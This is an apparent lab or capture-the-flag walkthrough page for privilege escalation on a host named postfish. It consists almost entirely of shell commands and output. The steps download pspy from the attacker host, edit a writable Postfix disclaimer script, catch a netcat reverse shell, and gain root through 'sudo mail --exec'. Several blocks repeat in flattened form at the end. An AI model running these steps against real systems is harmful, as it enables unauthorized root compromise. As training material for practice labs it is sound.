Priv Esc

EternaLSunshinE

brian.moore@postfish:~$ wget 192.168.45.168/pspy64
--2024-09-11 12:02:45--  http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                                          100%[=====================================================================================================>]   2.96M  5.99MB/s    in 0.5s    

2024-09-11 12:02:46 (5.99 MB/s) - ‘pspy64’ saved [3104768/3104768]

brian.moore@postfish:~$ chmod +x pspy64

brian.moore@postfish:~$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer
/var/spool/filter

brian.moore@postfish:/var/spool/filter$ ls -la /etc/postfix/disclaimer
-rwxrwx--- 1 root filter 1184 Sep 11 12:12 /etc/postfix/disclaimer

brian.moore@postfish:~$ cat /etc/postfix/disclaimer_addresses
it@postfish.off
brian.moore@postfish.off

brian.moore@postfish:~$ vi /etc/postfix/disclaimer

$ nc -lnvp 1337

$ swaks --to brian.moore@postfish.off --from adot8 --header 'Subject: Priv me baby!' --body 'Pwned by adot8 <3' --server 192.168.211.137

filter@postfish:/var/spool/postfix$ sudo -l
sudo -l
Matching Defaults entries for filter on postfish:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User filter may run the following commands on postfish:
    (ALL) NOPASSWD: /usr/bin/mail *

filter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/sh'
sudo mail --exec='!/bin/sh'
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/proof.txt && ip a
5372622453fc0880efc5b3257c5c09ad
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:bf:6a:1a brd ff:ff:ff:ff:ff:ff
    inet 192.168.211.137/24 brd 192.168.211.255 scope global ens160
       valid_lft forever preferred_lft forever

PreviousFoothold NextCredentials / Notes / LL

Last updated 5 months ago

brian.moore@postfish:~$ wget 192.168.45.168/pspy64 --2024-09-11 12:02:45-- http://192.168.45.168/pspy64 Connecting to 192.168.45.168:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3104768 (3.0M) [application/octet-stream] Saving to: ‘pspy64’ pspy64 100%[=====================================================================================================>] 2.96M 5.99MB/s in 0.5s 2024-09-11 12:02:46 (5.99 MB/s) - ‘pspy64’ saved [3104768/3104768] brian.moore@postfish:~$ chmod +x pspy64

filter@postfish:/var/spool/postfix$ sudo -l sudo -l Matching Defaults entries for filter on postfish: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User filter may run the following commands on postfish: (ALL) NOPASSWD: /usr/bin/mail *

filter@postfish:/var/spool/postfix$ sudo mail --exec='!/bin/sh' sudo mail --exec='!/bin/sh' whoami root id uid=0(root) gid=0(root) groups=0(root) cat /root/proof.txt && ip a 5372622453fc0880efc5b3257c5c09ad 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 00:50:56:bf:6a:1a brd ff:ff:ff:ff:ff:ff inet 192.168.211.137/24 brd 192.168.211.255 scope global ens160 valid_lft forever preferred_lft forever